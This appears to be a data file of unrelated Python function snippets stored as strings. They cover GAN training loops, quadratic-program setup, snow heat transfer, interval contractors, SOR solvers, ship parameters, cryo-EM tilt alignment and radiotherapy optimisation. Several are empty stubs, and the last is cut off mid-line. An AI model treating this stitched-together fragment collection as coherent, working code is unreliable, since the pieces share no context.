self.set_requires_grad([self.G_t, self.G_u, self.Att, self.classifier], False)\r\n self.optimizer_D.zero_grad() # set D_V's gradients to zero\r\n self.backward_D_V() # calculate graidents for D_V\r\n self.optimizer_D.step() # update D_A's weights\r\n\r\n # G_A and G_B\r\n self.set_requires_grad([self.D_V], False) # Ds require 
no gradients when optimizing Gs\r\n self.set_requires_grad([self.G_t, self.G_u, self.Att, self.classifier], True)\r\n self.optimizer_G.zero_grad() # set G_t,G_u,Att,classifier's gradients to zero\r\n self.backward_G() # calculate gradients for G_A and G_B\r\n self.optimizer_G.step() # update G_A and G_B's weights\r", "def optimize_parameters(self):\n # forward\n for i in range(min(self.big_iter+1,len(self.orders_rev))):\n if(self.orders_rev):\n # compute fake images and reconstruction images.\n self.forward(i,False)\n # G_A and G_B\n # Ds require no gradients when optimizing Gs\n self.set_requires_grad(self.netD, False)\n # set G_A and G_B's gradients to zero\n self.optimizers_G[self.orders_rev[i]].zero_grad()\n # calculate gradients for G_A and G_B\n self.backward_G(i,False)\n # update G_A and G_B's weights\n self.optimizers_G[self.orders_rev[i]].step()\n # D_A and D_B\n self.set_requires_grad(self.netD, True)\n self.optimizer_D.zero_grad() \n self.backward_D(i,False) \n self.optimizer_D.step() \n else:\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_DY() # calculate gradients for D_A\n self.optimizer_D.step()\n for i in range(min(self.big_iter+1, len(self.orders))):\n if(self.orders):\n if(i>0):\n self.real_A = self.fake_B.detach()\n self.forward(i,True) # compute fake images and reconstruction images.\n # G_A and G_B\n # Ds require no gradients when optimizing Gs\n self.set_requires_grad(self.netD, False)\n # set G_A and G_B's gradients to zero\n self.optimizers_G[self.orders[i]].zero_grad()\n self.backward_G(i,True) # calculate gradients for G_A and G_B\n # update G_A and G_B's weights\n self.optimizers_G[self.orders[i]].step()\n # D_A and D_B\n self.set_requires_grad(self.netD, True)\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_D(i,True) # calculate gradients for D_A\n self.optimizer_D.step() \n else:\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_DX() # calculate gradients for D_A\n self.optimizer_D.step() \n self.current_label=self.labels[0]\n self.current_order=self.orders\n self.current_pred = np.concatenate((self.pred_real.detach().cpu().numpy().mean(\n axis=2).mean(axis=2), self.pred_fake.detach().cpu().numpy().mean(axis=2).mean(axis=2)))", "def _reset_parameters(self):\n self._solver_input[\"P\"] = cvxopt.matrix(2.0 * self.opt.P(self.p).toarray())\n self._solver_input[\"q\"] = cvxopt.matrix(self.opt.q(self.p).toarray().flatten())\n if self.opt_type in CONSTRAINED_OPT:\n if self.opt.nk > 0:\n self._solver_input[\"G\"] = cvxopt.matrix(-self.opt.M(self.p).toarray())\n self._solver_input[\"h\"] = cvxopt.matrix(\n self.opt.c(self.p).toarray().flatten()\n )\n if self.opt.na > 0:\n self._solver_input[\"A\"] = cvxopt.matrix(self.opt.A(self.p).toarray())\n self._solver_input[\"b\"] = cvxopt.matrix(-self.opt.b(self.p).toarray())", "def update_model_parameters(phi, T, nz, coord, SWVD, form=\"Calonne\"):\r\n D_eff = np.ones(nz)\r\n\r\n if form == \"Hansen\": # Hansen and Foslien (2015)\r\n D_eff = phi * (1 - phi) * D0 + D0\r\n elif form == \"Calonne\": # Calonne et al. (2014)\r\n x = 2 / 3 - phi\r\n b = np.heaviside(x, 1)\r\n D_eff = D0 * (1 - 3 / 2 * phi) * b\r\n else:\r\n print(\"requested method not available, check input\")\r\n\r\n ## effective thermal conductivity W/m/K\r\n k_eff = np.ones(nz)\r\n\r\n if form == \"Hansen\": # Hansen and Foslien (2015)\r\n k_eff = phi * ((1 - phi) * k_a + phi * k_i) + k_a\r\n elif form == \"Calonne\": # Calonne et al. 
(2011)\r\n k_eff = ka0 + ka1 * (rho_i * phi) + ka2 * (rho_i * phi) ** 2\r\n else:\r\n print(\"requested method not available, check input\")\r\n\r\n ## effective heat capacity - similar forumla in Hansen and Foslien (2015) and Löwe et al. (2019)\r\n rhoC_eff = np.zeros(nz)\r\n rhoC_eff = phi * rho_i * C_i + (np.ones(nz) - phi) * rho_a * C_a\r\n\r\n ## Water Vapor density rho_v and its derivative rho_v_dT:\r\n [rho_v, rho_v_dT] = sat_vap_dens(nz, T, SWVD)\r\n\r\n return D_eff, k_eff, rhoC_eff, rho_v, rho_v_dT", "def contractor(self, *args, **kwargs):\n vertices = copy.deepcopy(args[0])\n nrange = len(vertices[0])\n xpts = []\n ypts = []\n for i in range(nrange):\n xpts.append(vertices[0][i].value)\n ypts.append(vertices[1][i].value)\n constraint = copy.deepcopy(args[1])\n \n \n \n \n qxdot,qxddot,qydot,qyddot = self.update_allq(xpts,ypts)\n \n ## the all important computation split (need to abstract this kind of thing)\n ##lhs = (np.sqrt(qxdot*qxdot + qydot*qydot)**3.) *constraint\n lhs = ( ( np.sqrt(qxdot**2 + qydot**2) )**3 )*constraint\n \n # check2 = qxdot*qyddot\n # if check2.width() < 1.e-2:\n # check2.min.value = check2.real.value\n # check2.max.value = check2.real.value\n # t1 = (lhs - check2)/qydot\n \n #\n # qyddot\n #\n check2 = qydot*qxddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n #if qxdot.contains(0.) and abs(qxdot.min.value)>1.e-6:\n # print 'qxdot = ',qxdot\n # print 'qxdot not invertable, implement other logic please'\n if abs(float(qxdot.inf))<1.e-6:\n qxdot.inf = 1.e-10\n print 'invert qxdot'\n print 'qxdot = ', qxdot\n \n #t1 = (lhs + qydot*qxddot)/(qxdot)\n t1 = (lhs + check2)/(qxdot)\n \n t1 = t1 & qyddot # go ahead and shrink t1 to qyddot - they are logically equivalent\n total_ans = []\n useful_indices = []\n bad_indices = []\n for i in range(len(ypts)): \n min_ans = 0.\n for j in range(len(ypts)):\n if j==i:\n pass\n else:\n min_ans = (ypts[j]*float(self.localBasis[2,j])) + min_ans\n min_ans = t1 - min_ans\n if (abs(float(self.localBasis[2,i])) > 0.0):\n min_ans = min_ans/float(self.localBasis[2,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(ypts, total_ans)\n for i in useful_indices:\n if new_ans[i].isempty == False: # abs( new_ans[i].width() ) > 0.:\n ypts[i] = ypts[i] & new_ans[i]\n qxdot,qxddot,qydot,qyddot = self.update_allq(xpts,ypts)\n else:\n print 'warning, possible constraint violation, curvature 1'\n \n ## \n ## qxdot\n ##\n check2 = qydot*qxddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n #if qyddot.contains(0.):\n # print 'qyddot = ',qyddot\n # print 'qyddot not invertable, implement other logic please'\n \n if qyddot.contains(0.) 
and qyddot.width()<1.e-6:\n qxdot.inf = 0.#1.e-10\n print 'invert qyddot'\n print 'qyddot = ',qyddot\n fix = (lhs + check2)*(1./qyddot)#*(qyddot**-1.)\n fix = fix & qxdot # go ahead and shrink fix to qxdot - they are logically equivalent\n total_ans = []\n useful_indices = []\n bad_indices = []\n \n for i in range(len(xpts)): #contract on x[i]\n min_ans = 0.\n for j in range(len(xpts)): # add up all jth pieces of the dot product except i\n if j==i:\n pass\n else:\n \n min_ans = (xpts[j]*float(self.localBasis[1,j] ) ) + min_ans\n min_ans = fix - min_ans\n if (abs(float(self.localBasis[1,i]) ) >0.0 ):\n min_ans = min_ans/float(self.localBasis[1,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(xpts, total_ans)\n for i in useful_indices:\n if not new_ans[i].isempty: # abs( new_ans[i].width() ) > 0.:\n xpts[i] = xpts[i] & new_ans[i]\n qxdot,qxddot,qydot,qyddot = self.update_allq(xpts,ypts)\n else:\n print 'warning, possible constraint violation, curvature 2'\n \n \n ## switch to the other side\n \n ##\n ## contract on qydot\n ##\n check2 = qxdot*qyddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n# if qxddot.contains(0.):\n# print 'qxddot = ',qxddot\n# print 'qxddot not invertable, implement other logic please'\n# qxddot.min.value = 0.\n if qxddot.contains(0.):\n qxddot.inf = 0.\n \n print 'invert qxddot'\n print 'qxddot = ',qxddot\n t1 = (lhs - check2)/(-qxddot)#*(-qxddot**-1)\n t1 = t1 & qydot\n total_ans = []\n useful_indices = []\n bad_indices = []\n for i in range(len(ypts)): \n min_ans = 0.\n for j in range(len(ypts)):\n if j==i:\n pass\n else:\n #print 't1 = ',t1\n #print 'ypts[{}] = {}'.format(i,ypts[i])\n #print 'localbasis[{},{}] = {}'.format(1,i,self.localBasis[1,j])\n min_ans = (ypts[j]*float(self.localBasis[1,j])) + min_ans\n min_ans = t1 - min_ans\n if (abs(float(self.localBasis[1,i])) > 0.0):\n min_ans = min_ans/float(self.localBasis[1,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(ypts, total_ans)\n for i in useful_indices:\n if not new_ans[i].isempty: # abs( new_ans[i].width() ) > 0.:\n ypts[i] = ypts[i] & new_ans[i]\n else:\n print 'warning, possible constraint violation, curvature 3'\n \n ##contract on qxdot\n \n check2 = qxdot*qyddot\n if check2.width() < 1.e-2 and check2.contains(0.):\n check2.inf = 0.\n check2.sup = 0.\n #contract on qxddot\n# if qydot.contains(0.):\n# print 'qydot = ',qxddot\n# print 'qydot not invertable, implement other logic please'\n if qydot.contains(0.):\n qydot.inf = 0.\n print 'invert qydot'\n print 'qydot = ',qydot\n fix = (lhs - qxdot*qyddot)/(-qydot)#*(-qydot**-1)\n fix = fix & qxddot # go ahead and shrink t1 to quddot - they are logically equivalent\n total_ans = []\n useful_indices = []\n bad_indices = []\n for i in range(len(xpts)):\n min_ans = 0.\n for j in range(len(xpts)):\n if j==i:\n pass\n else:\n min_ans = (xpts[j]*float(self.localBasis[2,j] ) ) + min_ans\n min_ans = fix - min_ans\n if (abs(float(self.localBasis[2,i]) ) >0.0 ):\n min_ans = min_ans/float(self.localBasis[2,i])\n useful_indices.append(i)\n else:\n bad_indices.append(i)\n total_ans.append(min_ans)\n \n new_ans = vector_AND_(xpts, total_ans)\n for i in useful_indices:\n if not new_ans[i].isempty: # abs( new_ans[i].width() ) > 0.:\n xpts[i] = xpts[i] & new_ans[i]\n else:\n print 'warning, possible constraint violation, curvature 4'\n \n for i in range(nrange):\n vertices[0][i].value = 
xpts[i]\n vertices[1][i].value = ypts[i]\n return vertices", "def _advance_settings(self, sol):\r\n if self.cond == True:\r\n # Save last solution...\r\n self.lst_tmp = sol\r\n # Check if all timesteps are complete.\r\n self.current_T += self.d_T\r\n self.step += 1\r\n if self.current_T > self.max_T:\r\n return False\r\n # Set to not be conduction any more\r\n self.cond = False\r\n if len(self.fq_list) > 0:\r\n self.rad = 0\r\n else:\r\n # There are radiation steps to do.\r\n self.cond = True\r\n return True\r\n\r\n # If we're here, we're either not done anything yet or have\r\n # just done a radiation step.\r\n if self.rad != None:\r\n # Save last solution\r\n self.lst_rad[self.rad] = sol\r\n # Advance to next radiation stage if one exists. Else cond.\r\n if self.rad + 1 != len(self.fq_list):\r\n self.rad += 1\r\n else:\r\n self.rad = None\r\n self.cond = True\r\n return True\r\n\r\n # If we've made it to here, we must just setting the simulation\r\n # going.\r\n assert (len(self.fq_list) == len(self.lst_rad))\r\n if len(self.lst_rad) > 0:\r\n assert (len(self.fq_list) == len(self.absorb_coeffs))\r\n assert (self.refr_idx_vol >= 0.0)\r\n # Could set to zero, but that might limit restarts. Just check\r\n # Validity....\r\n assert (self.step != None)\r\n assert (self.d_T > 0.0)\r\n assert (self.current_T != None)\r\n assert (self.max_T != None)\r\n assert (self.max_T > self.current_T)\r\n assert (self.diff_scale >= 0.0)\r\n assert (self.diff_scale <= 1.0)\r\n assert (self.thermal_conductivity > 0.0)\r\n assert (self.alpha >= 0.0)\r\n assert (self.refr_idx_background >= 0.0)\r\n # Set the ball rolling:\r\n if len(self.fq_list) > 0:\r\n # We can set solver for frequencies first...\r\n self.rad = 0\r\n else:\r\n self.cond = True\r\n return True", "def updateParameters(self):\r\n\r\n\t\tif self.approach.altered:\r\n\t\t\tself.transform.enabled = True\r\n\r\n\t\t\tif self.approach.value == 'Locations in the DEM generated from field observations':\r\n\t\t\t\tself.predefined_pattern.enabled = False\r\n\t\t\t\tself.pattern_workspace.enabled = False\r\n\t\t\t\tself.point_matrix_size.enabled = True\r\n\t\t\t\tself.point_vectors.enabled = True\r\n\t\t\t\tself.mapping_field.enabled = True\r\n\t\t\t\tself.move_to_max.enabled = True\r\n\t\t\t\tself.output_sim_matrix.enabled = True\r\n\t\t\t\tself.mh_dil_val.enabled = False\r\n\r\n\t\t\t\tself.mh_iteration.enabled = False\r\n\t\t\t\tself.mh_iteration.value = False\r\n\t\t\t\tself.output_table.enabled = False\r\n\t\t\t\tself.output_raster_workspace.enabled = False\r\n\t\t\t\tself.output_raster_workspace.value = ''\r\n\r\n\t\t\telif self.approach.value == 'Locations in the DEM versus pre-defined pattern':\r\n\t\t\t\tself.predefined_pattern.enabled = True\r\n\t\t\t\tself.point_matrix_size.enabled = True\r\n\t\t\t\tself.point_vectors.enabled = True\r\n\t\t\t\tself.mapping_field.enabled = True\r\n\t\t\t\tself.move_to_max.enabled = True\r\n\t\t\t\tself.mh_dil_val.enabled = True\r\n\t\t\t\tself.mh_iteration.enabled = True\r\n\t\t\t\tself.output_table.enabled = True\r\n\t\t\t\tself.output_sim_matrix.enabled = False\r\n\t\t\t\tself.output_sim_matrix.value = ''\r\n\t\t\t\tself.output_raster_workspace.enabled = False\r\n\t\t\t\tself.output_raster_workspace.value = ''\r\n\r\n\t\t\telse: # seek pre-defined pattern in DEM\r\n\t\t\t\tself.predefined_pattern.enabled = True\r\n\t\t\t\tself.point_matrix_size.enabled = True\r\n\t\t\t\tself.mh_iteration.enabled = True\r\n\t\t\t\tself.output_raster_workspace.enabled = True\r\n\t\t\t\tself.point_vectors.enabled = 
False\r\n\t\t\t\tself.point_vectors.value = ''\r\n\t\t\t\tself.mapping_field.enabled = False\r\n\t\t\t\tself.move_to_max.enabled = False\r\n\t\t\t\tself.move_to_max.value = False\r\n\t\t\t\tself.mh_dil_val.enabled = True\r\n\t\t\t\tself.output_sim_matrix.enabled = False\r\n\t\t\t\tself.output_sim_matrix.value = ''\r\n\t\t\t\tself.output_table.enabled = False\r\n\t\t\t\tself.output_table.value = ''\r\n\r\n\t\tif self.mh_iteration.altered:\r\n\r\n\t\t\tif self.mh_iteration.value is True:\r\n\t\t\t\tself.mh_dil_start.enabled = True\r\n\t\t\t\tself.mh_dil_stop.enabled = True\r\n\t\t\t\tself.mh_dil_step.enabled = True\r\n\t\t\t\tself.mh_dil_val.enabled = False\r\n\t\t\t\tself.mh_dil_val.value = 1\r\n\r\n\t\t\telse:\r\n\t\t\t\tif self.approach.value == 'Locations in the DEM generated from field observations':\r\n\t\t\t\t\tself.mh_dil_val.enabled = False\r\n\t\t\t\t\tself.mh_dil_val.value = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.mh_dil_val.enabled = True\r\n\r\n\t\t\t\tself.mh_dil_start.enabled = False\r\n\t\t\t\tself.mh_dil_stop.enabled = False\r\n\t\t\t\tself.mh_dil_step.enabled = False\r\n\t\t\t\tself.mh_dil_start.value = 0.01\r\n\t\t\t\tself.mh_dil_stop.value = 1\r\n\t\t\t\tself.mh_dil_step.value = 0.1\r\n\r\n\t\tif self.move_to_max.altered:\r\n\t\t\tif self.move_to_max.value is True:\r\n\t\t\t\tself.move_to_max_distance.enabled = True\r\n\t\t\telse:\r\n\t\t\t\tself.move_to_max_distance.enabled = False\r\n\t\t\t\tself.move_to_max_distance.value = 3\r\n\r\n\t\tif self.transform.altered:\r\n\t\t\tif self.transform.value == 'Work directly on the elevation matrix':\r\n\t\t\t\tself.size_of_the_cell.enabled = False\r\n\t\t\telif self.transform.value == 'Perform a local translation':\r\n\t\t\t\tself.size_of_the_cell.enabled = False\r\n\t\t\telif self.transform.value == 'Compute slopes' or self.transform.value == \\\r\n\t\t\t\t\t'Compute slopes and perform local translation':\r\n\t\t\t\tself.size_of_the_cell.enabled = True\r\n\r\n\t\tif self.predefined_pattern.altered:\r\n\t\t\tif self.predefined_pattern.value == 'Custom pattern':\r\n\t\t\t\tself.pattern_workspace.enabled = True\r\n\r\n\t\t\t\tself.mh_iteration.value = False\r\n\t\t\t\tself.mh_iteration.enabled = False\r\n\t\t\t\tself.mh_dil_start.enabled = False\r\n\t\t\t\tself.mh_dil_stop.enabled = False\r\n\t\t\t\tself.mh_dil_step.enabled = False\r\n\t\t\t\tself.mh_dil_start.value = 0.01\r\n\t\t\t\tself.mh_dil_stop.value = 1\r\n\t\t\t\tself.mh_dil_step.value = 0.1\r\n\t\t\t\tself.mh_dil_val.enabled = False\r\n\t\t\t\tself.mh_dil_val.value = 1\r\n\t\t\telse:\r\n\t\t\t\tself.pattern_workspace.enabled = False", "def SOR_Solve_Opt(A,b,tol=1.0e-6,max_iterations=100,LOUD=False):\n [Nrow, Ncol] = A.shape\n assert Nrow == Ncol\n N = Nrow\n converged = False\n iteration = 1\n omega = 1\n l = 5\n p = 2\n x = np.random.rand(N) #random initial guess \n x_new = np.zeros(N)\n while not(converged):\n x = x_new.copy() #replace old value\n for row in range(N):\n x_new[row] = b[row]\n for column in range(N):\n if column != row:\n x_new[row] -= A[row,column]*x_new[column]\n x_new[row] /= A[row,row]\n x_new[row] = (1.0-omega) * x[row] + omega*x_new[row]\n relative_change = np.linalg.norm(x_new-x)/np.linalg.norm(x_new)\n #record change after iteration k\n if (l==iteration):\n dxl = np.linalg.norm(x_new-x)\n if (l + p == iteration):\n dxlp = np.linalg.norm(x_new-x)\n omega = 2.0/(1.0+np.sqrt(1-(dxlp/dxl)**(1.0/p)))\n if (LOUD):\n print(\"Iteration\",iteration,\": Relative Change =\",relative_change)\n if (relative_change < tol) or (iteration >= max_iterations):\n 
converged = True\n iteration += 1\n return x_new", "def get_sol(self):", "def _compute_correction(self, initial_state, final_state, a, b, c, s):\r\n pertub = self.pertub\r\n pertub_s = pertub *10\r\n \r\n pred_no_pertub = self._motion_update_one_shot(initial_state, a, b, c, s)\r\n pred_pertub_a = self._motion_update_one_shot(initial_state, a +pertub, b, c, s)\r\n pred_pertub_b = self._motion_update_one_shot(initial_state, a, b +pertub, c, s)\r\n # no need to correct C, C is constrained by kappa_final\r\n # # pred_pertub_c = self._motion_update_one_shot(initial_state, a, b, c +pertub, s)\r\n pred_pertub_s = self._motion_update_one_shot(initial_state, a, b, c, s +pertub_s)\r\n\r\n d_state = np.zeros((3,1))\r\n d_pertub_state = np.zeros((3,3))\r\n Jacobian = np.zeros((3,3))\r\n for i in range(0, 3):\r\n d_pertub_state[i][0] = (final_state[i] - pred_pertub_a[i]) # a\r\n d_pertub_state[i][1] = (final_state[i] - pred_pertub_b[i]) # b\r\n # d_pertub_state[i][2] = (final_state[i] - pred_pertub_c[i]) # c (no update)\r\n d_pertub_state[i][2] = (final_state[i] - pred_pertub_s[i]) # s\r\n \r\n d_state[i] = final_state[i] - pred_no_pertub[i]\r\n \r\n Jacobian[i][0] = (d_pertub_state[i][0] - d_state[i])/pertub # a\r\n Jacobian[i][1] = (d_pertub_state[i][1] - d_state[i])/pertub # b\r\n # Jacobian[i][2] = (d_pertub_state[i][2] - d_state[i])/pertub # c (no update)\r\n Jacobian[i][2] = (d_pertub_state[i][2] - d_state[i])/pertub_s # s\r\n\r\n # inv_Jacobian = np.linalg.inv(Jacobian)\r\n inv_Jacobian = np.linalg.pinv(Jacobian)\r\n correction = np.dot(inv_Jacobian, d_state)\r\n # pdb.set_trace()\r\n return correction", "def _compute_solar_torque(self):\n pass", "def initial_parameters(ship_data: dict) -> dict:\n\n mask = df_parameters[\"brix_lambda\"].notnull()\n df_parameters.loc[mask, \"brix_prime\"] = df_parameters.loc[mask].apply(\n calculate_prime, ship_parameters=ship_data, axis=1\n )\n\n df_parameters[\"prime\"] = df_parameters[\"brix_prime\"]\n\n df_parameters.loc[\"Ydelta\", \"prime\"] = 0.003 # Just guessing\n df_parameters.loc[\"Ndelta\", \"prime\"] = (\n -df_parameters.loc[\"Ydelta\", \"prime\"] / 2\n ) # Just guessing\n\n df_parameters.loc[\"Nu\", \"prime\"] = 0\n df_parameters.loc[\"Nur\", \"prime\"] = 0\n # df_parameters.loc[\"Xdelta\", \"prime\"] = -0.001\n df_parameters.loc[\"Xr\", \"prime\"] = 0\n df_parameters.loc[\"Xrr\", \"prime\"] = 0.000\n df_parameters.loc[\"Xu\", \"prime\"] = 0\n df_parameters.loc[\"Xuu\", \"prime\"] = 0\n df_parameters.loc[\"Xv\", \"prime\"] = 0\n df_parameters.loc[\"Xvr\", \"prime\"] = 0\n df_parameters.loc[\"Yu\", \"prime\"] = 0\n df_parameters.loc[\"Yur\", \"prime\"] = 0.00\n\n df_parameters.loc[\"Nuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Xthrust\", \"prime\"] = 1.0\n df_parameters.loc[\"Yrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xvdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Xdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yvdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nrdeltadelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Yuv\", \"prime\"] = 0.0\n df_parameters.loc[\"Nvdeltadelta\", \"prime\"] = 0.0\n\n df_parameters.loc[\"Ythrustdelta\", \"prime\"] = 0.0\n df_parameters.loc[\"Nthrustdelta\", \"prime\"] = 0.0\n\n parameters = df_parameters[\"prime\"].dropna().to_dict()\n\n return parameters", "def solve(self, **kwargs) -> OptimizationResult:\n raise NotImplementedError", "def construct_param_dict(params,K_RC,K_CP,m_P):\n ###scaling constants\n w=params['w']\n pd=params['pd'] # in 3D and 0.21 in 2D\n pv=params['pv']\n 
Er=params['Er'] ;Ek=params['Ek']\n ER=params['ER'];EC=params['EC'];EP=params['EP'];\n Eq1=params['Eq1'];Eq2=params['Eq2']\n\n\n #capture success function\n a = params['a']\n b = params['b']\n c = params['c']\n formC = params['formC']\n formPC = params['formPC']\n formPR = params['formPR']\n \n ###variables\n TR= params['TR'] ;TC= params['TC'];TP=params['TP'];D_R= params['D_R']; D_C= params['D_C']\n K_RP=K_RC*K_CP\n fmC=params['fmC'];thermyR=params['thermyR']\n thermyC=params['thermyC'];thermyP=params['thermyP']\n fmPR=params['fmPR']\n fmPC=params['fmPC']\n m_C = K_CP*m_P;m_R = K_RP*m_P\n ###normalization constants and boltzmann constant\n r0 = params['r0']\n k0 = params['k0'] # will depend on the productivity of the habitat\n a01 = a02 = params['a012'] # will depedend on the dimension of the habitat \n a03 = params['a03']\n d0= params['d0']\n q10 = params['q10'];q20 = params['q20'];\n v0R = params['v0R'];v0C =params['v0C'];v0P =params['v0P'];k = b_k\n hC0 = params['hC0'];hP0 = params['hP0'] \n \n #intrapopulation parameters\n q1=set_q1(q10,m_C,w,Eq1,TR,k)\n q2=set_q2(q20,m_P,w,Eq2,TC,k)\n K=set_K(k0,m_R,w,Ek,TR,k)\n r=set_r(r0,m_R,w,Er,TR,k)\n\n #interpopulation parameters\n a1=set_alfa(m_C,a01,K_RC,pv,pd,TR,TC,ER,EC,D_R,v0R,v0C,g,alfa,fmC,thermyR,thermyC,k,a,b,c,formC)\n a2=set_alfa(m_P,a02,K_RP,pv,pd,TR,TP,ER,EP,D_R,v0R,v0P,g,alfa,fmPR,thermyR,thermyP,k,a,b,c,formPR)\n a3=set_alfa(m_P,a03,K_CP,pv,pd,TC,TP,EC,EP,D_C,v0C,v0P,g,alfa,fmPC,thermyC,thermyP,k,a,b,c,formPC)\n\n t_hp = set_th(hP0,m_P,w,EP,k,TP)\n t_hc = set_th(hC0,m_C,w,EC,k,TC)\n param_dict={'q1':q1,'q2':q2,'K':K,'r':r,'a1':a1,'a2':a2,'a3':a3,'t_hp':t_hp,'t_hc':t_hc}\n \n return param_dict", "def solve(self):", "def setOptimizableVariables(self, TiltAlignmentParameters_, optimizableVariables):\n ntilt = self._ntilt\n nmark = len(self._Markers)\n\n nopti = (nmark - 1) * 3\n\n if self.optimizeMarkerPositions:\n # translation\n nopti += (ntilt) * 2\n\n # variable magnifications for projections, exclude scaling of reference image (S==1)\n if TiltAlignmentParameters_.dmag:\n nopti += ntilt - 1\n\n #variable rotation for projections\n if TiltAlignmentParameters_.drot:\n nopti += ntilt\n else:\n nopti += 1\n\n # beam tilt\n if TiltAlignmentParameters_.dbeam:\n nopti += 1\n\n # nopti += ntilt\n ## gradient on image rotation and magnification in projections\n #if TiltAlignmentParameters_.dGradRotMag:\n # nopti = nopti + 2\n\n # check that number of variables is ok\n if len(optimizableVariables) != nopti:\n print(\"Length optimizableVariables: \" + str(len(optimizableVariables)))\n print(\"N optmization: \" + str(nopti))\n raise IndexError('length of optimizableVariables does not match TiltAlignmentParameters')\n\n # marker 3D coords\n ivar = 0\n\n\n for (imark, Marker) in enumerate(self._Markers):\n # reference marker irefmark is fixed to standard value\n if ((imark ) != TiltAlignmentParameters_.irefmark):\n r = numpy.array([optimizableVariables[ivar],\n optimizableVariables[ivar + 1], optimizableVariables[ivar + 2]])\n self._Markers[imark].set_r(r)\n\n ivar = ivar + 3\n\n\n if self.optimizeMarkerPositions:\n # translations\n for itilt in range(0, ntilt):\n # translation in reference projection is zero\n #FFif (self._projIndices[itilt] != TiltAlignmentParameters_.ireftilt):\n self._alignmentTransX[itilt] = optimizableVariables[ivar]\n self._alignmentTransY[itilt] = optimizableVariables[ivar + 1]\n ivar = ivar + 2\n\n\n\n # magnification changes\n if TiltAlignmentParameters_.dmag:\n for itilt in range(0, ntilt):\n # magnification of 
reference projection is 1.\n if (int(self._projIndices[itilt]) != int(self._projIndices[self.ireftilt])):\n self._alignmentMagnifications[itilt] = optimizableVariables[ivar]\n ivar = ivar + 1\n\n # image rotations\n if TiltAlignmentParameters_.drot:\n for itilt in range(0, ntilt):\n self._alignmentRotations[itilt] = optimizableVariables[ivar]\n ivar = ivar + 1\n # all rotations are the same - take the first one\n else:\n self._alignmentRotations[0] = optimizableVariables[ivar]\n ivar = ivar + 1\n\n\n\n # beam inclination\n if TiltAlignmentParameters_.dbeam:\n self._alignmentBeamTilt = optimizableVariables[ivar]\n ivar = ivar + 1\n\n # focus gradient (TODO)\n #if TiltAlignmentParameters_.dGradRotMag:\n # optimizableVariables[ivar] = self._alignmentMagnFoc\n # optimizableVariables[ivar+1] = self._alignmentRotFoc\n\n\n if not self.optimizeMarkerPositions:\n from pytom.scripts.Rotation_function import calculate_translation\n\n\n # r_model is the modelled x,y,z coordinate of the reference marker\n r_model = self._Markers[self.irefmark].get_r()\n\n # if using a reduced set using an indices existing in the reduced set\n # i = int(numpy.argwhere(self.TiltSeries_._projIndices.astype(int) == self.TiltSeries_._TiltAlignmentParas.ireftilt)[0][0])\n psi_ref = numpy.deg2rad(numpy.mean(self._alignmentRotations) + 90)\n\n for iproj in range(0,ntilt):\n # setting variables\n marker = self._Markers[self.irefmark]\n r_exp_tilt = numpy.array([marker.get_xProj(iproj), marker.get_yProj(iproj)]) - numpy.array(\n self.TiltSeries_._TiltAlignmentParas.cent)\n psi_itilt = numpy.deg2rad(self._alignmentRotations[iproj] + 90)\n theta_itilt = numpy.deg2rad(self._tiltAngles[iproj])\n magnification =self._alignmentMagnifications[iproj]\n\n # calculating translation setting difference model and experimental reference marker point at 0\n tx, ty = calculate_translation(r_model, r_exp_tilt, psi_ref, psi_itilt, theta_itilt, magnification)\n\n\n self._alignmentTransX[iproj] = tx\n self._alignmentTransY[iproj] = ty\n\n\n\n # print(self.irefmark, self._alignmentTransX[self.ireftilt], self._alignmentTransY[self.ireftilt])\n # for itilt in range(ntilt):\n # self.q[itilt] = optimizableVariables[ivar]\n # ivar += 1", "def solver_auto_param(u_init, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, eta_step = 0.5, eta_step_tumor = 0.99, ftol = 1e-3, max_iter = 300, verbose = 0, nnls_max_iter=30):\n auto_param_obj_history = []\n auto_param_relaxed_obj_history = []\n \n eta_0 = (1/(2*np.max(B)))*0.5 #Initialize eta_0\n eta = np.array([eta_0/len(H)]*len(H))*0.9\n eta_lin = np.ones(L_lhs.shape[0])*0.01\n \n u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u_init, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose, nnls_max_iter=nnls_max_iter)\n # solver(u_init, eta_0, eta, T, H, alpha, gamma, B, D, C, ftol = 1e-3, max_iter = 300, verbose = verbose)\n auto_param_obj_history.append(obj_history)\n auto_param_relaxed_obj_history.append(relaxed_obj_history)\n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n \n print('Enforcing Feasibility')\n count = 0\n num_violated = -1\n while (len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear))):\n count += 1\n num_violated_prev = np.copy(num_violated)\n num_violated_oar = len(H) - cnstr['Relaxed'].sum()\n num_violated_lin = L_lhs.shape[0] - np.sum(cnstr_linear)#(1 - int(cnstr_linear))\n num_violated = len(H) - cnstr['Relaxed'].sum() 
